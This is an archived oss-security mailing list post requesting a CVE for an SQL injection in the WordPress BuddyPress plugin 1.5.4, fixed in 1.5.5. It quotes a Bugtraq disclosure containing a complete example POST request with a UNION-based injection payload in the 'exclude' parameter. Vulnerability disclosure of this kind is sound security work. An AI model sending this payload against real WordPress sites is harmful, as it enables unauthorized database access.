Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 15 Apr 2012 12:05:37 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Subject: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4

Hello,

Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin SQL-injection.

Affected: 1.5.4
Fixed: 1.5.5
Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/
OSVDB: http://osvdb.org/show/osvdb/80763
Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to say about this issue)

http://seclists.org/bugtraq/2012/Apr/4
"""
Hi,

I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was 
reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to 
last version, if you haven't done it yet. Example of POST message with sql injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
"""

- Henri Salo

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ